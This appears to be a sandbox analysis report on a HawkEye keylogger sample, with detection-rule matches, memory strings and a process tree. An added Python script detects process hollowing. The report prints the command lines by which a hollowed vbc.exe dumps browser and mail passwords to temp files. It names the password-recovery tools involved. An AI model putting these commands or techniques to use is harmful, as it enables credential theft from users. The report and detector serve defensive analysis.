                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.tDb0ggawON.exe.303f17c.6.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000002.520764467.0000000008080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Code functions (process 0): 0_2_017F2140, 0_2_017F3050, 0_2_017F1020, 0_2_017F0480, 0_2_017F1790, 0_2_017FBFB0, 0_2_017F3174, 0_2_017F3149, 0_2_017F2130, 0_2_017F5100, 0_2_017F3031, 0_2_017FF010, 0_2_017F30FC, 0_2_017F50F0, 0_2_017F5308, 0_2_017F33F4, 0_2_017F52F8, 0_2_017F5548, 0_2_017F5538, 0_2_017F3519, 0_2_017F0471, 0_2_017F3401, 0_2_017F5760, 0_2_017F5750, 0_2_017F1781, 0_2_017FC608, 0_2_017F4A58, 0_2_017F4A48, 0_2_017FDA00, 0_2_017F4D58, 0_2_017F4D48, 0_2_017F0F7D, 0_2_017F3EE0, 0_2_017F3ED1, 0_2_05A40448, 0_2_05A4E5A8, 0_2_05A4E5B8, 0_2_05A4043B, 0_2_05A4C0FC, 0_2_09F156D0, 0_2_09F10040, 0_2_09F10714
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Code functions (process 11): 11_2_078CB4E0, 11_2_078CEEC8, 11_2_078CBDB0, 11_2_078CB198, 11_2_078C0026
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code functions (process 14): 14_2_00404419, 14_2_00404516, 14_2_00413538, 14_2_004145A1, 14_2_0040E639, 14_2_004337AF, 14_2_004399B1, 14_2_0043DAE7, 14_2_00405CF6, 14_2_00403F85, 14_2_00411F99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code functions (process 15): 15_2_00404DDB, 15_2_0040BD8A, 15_2_00404E4C, 15_2_00404EBD, 15_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00411538 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Process Stats: CPU usage > 98%
Source: tDb0ggawON.exe; Binary or memory string: OriginalFilename vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.301588725.00000000010E2000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.311192857.000000000AAC0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameriched20.dllp( vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameSharpStructures.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000000.295618911.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000000.297629080.0000000000482000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
Source: tDb0ggawON.exe; Binary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
Source: tDb0ggawON.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tDb0ggawON.exe; Virustotal: Detection: 33%
Source: tDb0ggawON.exe; Metadefender: Detection: 14%
Source: tDb0ggawON.exe; ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Users\user\Desktop\tDb0ggawON.exe "C:\Users\user\Desktop\tDb0ggawON.exe"
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Process created: C:\Users\user\Desktop\tDb0ggawON.exe C:\Users\user\Desktop\tDb0ggawON.exe
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
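The process tree above is what process hollowing looks like in process-creation telemetry: a binary in a user-writable directory re-launches its own image, and that copy then starts the VB.NET compiler vbc.exe with /stext, which is the file-output switch of NirSoft's command-line password-recovery tools (the mailpv.exe and WebBrowserPassView.exe strings found in memory), not a switch vbc.exe accepts. The following Python is an added detection example written for this page; it is not Joe Sandbox, HawkEye or NirSoft code. The event records are constructed to mirror the report's process tree, their field names and PIDs are assumptions, and assigning both vbc.exe children to the second tDb0ggawON.exe instance is assumed. The rules generalize beyond this sample: they cover the other .NET Framework binaries commonly hollowed in the same way and all of NirSoft's /s* save switches.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Constructed process-creation events mirroring the report's process tree.
# The schema (pid, ppid, parent_image, image, cmdline) is this example's own
# assumption, not a Joe Sandbox or Sysmon layout; PIDs are made up.
EVENTS = [
    {"pid": 100, "ppid": 4000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\user\Desktop\tDb0ggawON.exe",
     "cmdline": r'"C:\Users\user\Desktop\tDb0ggawON.exe"'},
    {"pid": 111, "ppid": 100, "parent_image": r"C:\Users\user\Desktop\tDb0ggawON.exe",
     "image": r"C:\Users\user\Desktop\tDb0ggawON.exe",
     "cmdline": r"C:\Users\user\Desktop\tDb0ggawON.exe"},
    {"pid": 114, "ppid": 111, "parent_image": r"C:\Users\user\Desktop\tDb0ggawON.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"'},
    {"pid": 115, "ppid": 111, "parent_image": r"C:\Users\user\Desktop\tDb0ggawON.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"'},
    # Benign control (constructed): MSBuild invoking the real compiler with compiler switches.
    {"pid": 200, "ppid": 150, "parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /noconfig /out:obj\Release\App.exe /target:exe Form1.vb"},
]

# Locations a standard user can write to; legitimate software rarely
# re-executes its own image from here.
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\(desktop|downloads|appdata)\\")

# .NET Framework binaries routinely started suspended and hollowed because
# they are Microsoft-signed and present on every Windows installation.
DOTNET_HOST = re.compile(
    r"(?i)^[a-z]:\\windows\\microsoft\.net\\framework(64)?\\v[\d.]+\\"
    r"(vbc|csc|regasm|regsvcs|msbuild|installutil|applaunch)\.exe$")

# Output switches of NirSoft's command-line password-recovery tools
# (/stext, /stab, /scomma, /stabular, /shtml, /sverhtml, /sxml). The VB.NET
# compiler accepts none of them, so one on a vbc.exe command line means the
# code running under that image is not vbc.exe.
NIRSOFT_SAVE_SWITCH = re.compile(
    r'(?i)(?:^|\s)/s(?:text|tab|comma|tabular|html|verhtml|xml)\s+(?:"([^"]+)"|(\S+))')


def nirsoft_output_path(cmdline: str):
    """Return the file a NirSoft save switch would write, or None if there is none."""
    m = NIRSOFT_SAVE_SWITCH.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def triage(events):
    """Apply the three rules to a list of process-creation events and return findings."""
    findings = []
    for ev in events:
        image, parent, cmd, pid = ev["image"], ev["parent_image"], ev["cmdline"], ev["pid"]
        # Rule 1: a user-writable binary launching its own image again, the
        # spawn-then-overwrite shape of hollowing (process 0 -> process 11 in the report).
        if image.lower() == parent.lower() and USER_WRITABLE.match(image):
            findings.append(Finding("self_reexec", pid, f"{image} spawned a copy of itself"))
        if DOTNET_HOST.match(image):
            # Rule 2: a .NET host carrying a NirSoft save switch; the path it
            # names is the credential dump a responder should collect.
            out = nirsoft_output_path(cmd)
            if out:
                findings.append(Finding("dotnet_host_nirsoft_switch", pid,
                                        f"{image} given a NirSoft save switch, output {out}"))
            # Rule 3: a .NET host whose parent is not a build tool but a
            # binary living in a user-writable directory.
            if USER_WRITABLE.match(parent):
                findings.append(Finding("dotnet_host_user_parent", pid,
                                        f"{image} started by {parent}"))
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail}")
```

Against the constructed events the two vbc.exe children trip rules 2 and 3, the second tDb0ggawON.exe instance trips rule 1, and the MSBuild-driven compiler run produces nothing, which is the distinction that keeps rule 3 usable on developer workstations.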
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; System information queried: HandleInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tDb0ggawON.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File created: C:\Users\user\AppData\Local\Temp\bhvED7C.tmp
Source: classification engine; Classification label: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: tDb0ggawON.exe (00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp), vbc.exe (0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp); Binary or memory strings (SQLite library statements):
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, 11.0.tDb0ggawON.exe.400000.6.unpack, 11.0.tDb0ggawON.exe.400000.11.unpack, 11.0.tDb0ggawON.exe.400000.16.unpack, 11.0.tDb0ggawON.exe.400000.21.unpack and 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle
